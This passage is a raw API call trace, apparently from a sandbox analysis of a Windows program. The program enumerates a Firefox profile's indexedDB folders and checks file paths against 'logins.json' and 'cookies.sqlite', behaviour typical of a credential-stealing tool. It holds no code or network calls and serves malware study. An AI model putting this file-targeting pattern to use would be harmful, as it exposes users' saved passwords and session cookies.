(lpString1=".", lpString2=".") returned 0 [0161.147] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df048 | out: lpFindFileData=0x2df048*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb8110d50, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb8110d50, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.147] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.147] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.147] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df048 | out: lpFindFileData=0x2df048*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb70ff8d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb70ff8d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb70ff8d0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a, dwReserved1=0x0, cFileName="818200132aebmoouht", cAlternateFileName="818200~1")) returned 1 [0161.147] lstrcmpiW (lpString1="818200132aebmoouht", lpString2=".") returned 1 [0161.147] lstrcmpiW (lpString1="818200132aebmoouht", lpString2="..") returned 1 [0161.147] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned 121 [0161.147] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned 121 [0161.147] lstrlenW (lpString="\\") returned 1 [0161.147] GetProcessHeap () returned 0x8e0000 [0161.147] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf6) returned 0x925838 [0161.147] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" [0161.147] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" [0161.147] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 122 [0161.147] lstrlenW (lpString="818200132aebmoouht") returned 18 [0161.147] GetProcessHeap () returned 0x8e0000 [0161.147] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11a) returned 0x925938 [0161.147] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" [0161.147] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpString2="818200132aebmoouht" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht" [0161.147] VirtualQuery (in: lpAddress=0x925838, lpBuffer=0x2deff0, dwLength=0x1c | out: lpBuffer=0x2deff0*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.147] GetProcessHeap () returned 0x8e0000 [0161.147] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925838 | out: hHeap=0x8e0000) returned 1 [0161.147] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned 140 [0161.147] lstrlenW (lpString="") returned 0 [0161.148] GetProcessHeap () returned 0x8e0000 [0161.148] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11a) returned 0x925a60 [0161.148] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht" [0161.148] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht" [0161.148] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned 140 [0161.148] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned 140 [0161.148] lstrlenW (lpString="\\*.*") returned 4 [0161.148] GetProcessHeap () returned 0x8e0000 [0161.148] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x122) returned 0x925b88 [0161.148] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht" [0161.148] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*.*" [0161.148] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*.*", lpFindFileData=0x2dedd0 | out: lpFindFileData=0x2dedd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb70ff8d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb70ff8d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb70ff8d0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2d007a, dwReserved1=0x610073, cFileName=".", cAlternateFileName="")) returned 0x8f9b40 [0161.148] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.148] FindNextFileW (in: hFindFile=0x8f9b40, lpFindFileData=0x2dedd0 | out: lpFindFileData=0x2dedd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb70ff8d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb70ff8d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb70ff8d0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2d007a, dwReserved1=0x610073, cFileName="..", cAlternateFileName="")) returned 1 [0161.148] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.148] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.148] FindNextFileW (in: hFindFile=0x8f9b40, lpFindFileData=0x2dedd0 | out: lpFindFileData=0x2dedd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb70ff8d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb70ff8d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb70ff8d0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2d007a, dwReserved1=0x610073, cFileName="..", cAlternateFileName="")) returned 0 [0161.148] FindClose (in: hFindFile=0x8f9b40 | out: hFindFile=0x8f9b40) returned 1 [0161.148] VirtualQuery (in: lpAddress=0x925b88, lpBuffer=0x2ded84, dwLength=0x1c | out: lpBuffer=0x2ded84*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.148] GetProcessHeap () returned 0x8e0000 [0161.148] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925b88 | out: hHeap=0x8e0000) returned 1 [0161.148] VirtualQuery (in: lpAddress=0x925a60, lpBuffer=0x2ded84, dwLength=0x1c | out: lpBuffer=0x2ded84*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.148] GetProcessHeap () returned 0x8e0000 [0161.148] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925a60 | out: hHeap=0x8e0000) returned 1 [0161.148] VirtualQuery (in: lpAddress=0x925938, lpBuffer=0x2deffc, dwLength=0x1c | out: lpBuffer=0x2deffc*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.148] GetProcessHeap () returned 0x8e0000 [0161.148] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925938 | out: hHeap=0x8e0000) returned 1 [0161.148] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned 121 [0161.148] lstrlenW (lpString="\\") returned 1 [0161.148] GetProcessHeap () returned 0x8e0000 [0161.149] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf6) returned 0x925838 [0161.149] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" [0161.149] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" [0161.149] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 122 [0161.149] lstrlenW (lpString="818200132aebmoouht") returned 18 [0161.149] GetProcessHeap () returned 0x8e0000 [0161.149] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11a) returned 0x925938 [0161.149] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" [0161.149] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpString2="818200132aebmoouht" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht" [0161.149] VirtualQuery (in: lpAddress=0x925838, lpBuffer=0x2deff0, dwLength=0x1c | out: lpBuffer=0x2deff0*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.149] GetProcessHeap () returned 0x8e0000 [0161.149] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925838 | out: hHeap=0x8e0000) returned 1 [0161.149] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht", lpSrch="logins.json") returned 0x0 [0161.149] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht", lpSrch="cookies.sqlite") returned 0x0 [0161.149] VirtualQuery (in: lpAddress=0x925938, lpBuffer=0x2deffc, dwLength=0x1c | out: lpBuffer=0x2deffc*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.149] GetProcessHeap () returned 0x8e0000 [0161.149] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925938 | out: hHeap=0x8e0000) returned 1 [0161.149] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df048 | out: lpFindFileData=0x2df048*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb81a92d0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xa0000, dwReserved0=0x2a, dwReserved1=0x0, cFileName="818200132aebmoouht.sqlite", cAlternateFileName="818200~1.SQL")) returned 1 [0161.149] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned 121 [0161.149] lstrlenW (lpString="\\") returned 1 [0161.149] GetProcessHeap () returned 0x8e0000 [0161.149] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf6) returned 0x925838 [0161.149] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" [0161.149] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" [0161.149] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 122 [0161.149] lstrlenW (lpString="818200132aebmoouht.sqlite") returned 25 [0161.149] GetProcessHeap () returned 0x8e0000 [0161.149] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x128) returned 0x925938 [0161.149] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" [0161.149] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpString2="818200132aebmoouht.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" [0161.149] VirtualQuery (in: lpAddress=0x925838, lpBuffer=0x2deff0, dwLength=0x1c | out: lpBuffer=0x2deff0*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.149] GetProcessHeap () returned 0x8e0000 [0161.149] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925838 | out: hHeap=0x8e0000) returned 1 [0161.150] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", lpSrch="logins.json") returned 0x0 [0161.150] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", lpSrch="cookies.sqlite") returned 0x0 [0161.150] VirtualQuery (in: lpAddress=0x925938, lpBuffer=0x2deffc, dwLength=0x1c | out: lpBuffer=0x2deffc*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.150] GetProcessHeap () returned 0x8e0000 [0161.150] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925938 | out: hHeap=0x8e0000) returned 1 [0161.150] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df048 | out: lpFindFileData=0x2df048*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb81a92d0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xa0000, dwReserved0=0x2a, dwReserved1=0x0, cFileName="818200132aebmoouht.sqlite", cAlternateFileName="818200~1.SQL")) returned 0 [0161.150] FindClose (in: hFindFile=0x8f9b00 | out: hFindFile=0x8f9b00) returned 1 [0161.150] VirtualQuery (in: lpAddress=0x925730, lpBuffer=0x2deffc, dwLength=0x1c | out: lpBuffer=0x2deffc*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.150] GetProcessHeap () returned 0x8e0000 [0161.150] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925730 | out: hHeap=0x8e0000) returned 1 [0161.150] VirtualQuery (in: lpAddress=0x925630, lpBuffer=0x2deffc, dwLength=0x1c | out: lpBuffer=0x2deffc*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.150] GetProcessHeap () returned 0x8e0000 [0161.150] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925630 | out: hHeap=0x8e0000) returned 1 [0161.150] VirtualQuery (in: lpAddress=0x925530, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.150] GetProcessHeap () returned 0x8e0000 [0161.150] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925530 | out: hHeap=0x8e0000) returned 1 [0161.150] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned 117 [0161.150] lstrlenW (lpString="\\") returned 1 [0161.150] GetProcessHeap () returned 0x8e0000 [0161.150] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xee) returned 0x925438 [0161.150] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" [0161.150] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" [0161.150] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned 118 [0161.150] lstrlenW (lpString="idb") returned 3 [0161.150] GetProcessHeap () returned 0x8e0000 [0161.150] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf4) returned 0x925530 [0161.150] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" [0161.150] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpString2="idb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" [0161.150] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2df268, dwLength=0x1c | out: lpBuffer=0x2df268*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.150] GetProcessHeap () returned 0x8e0000 [0161.150] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0161.150] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS 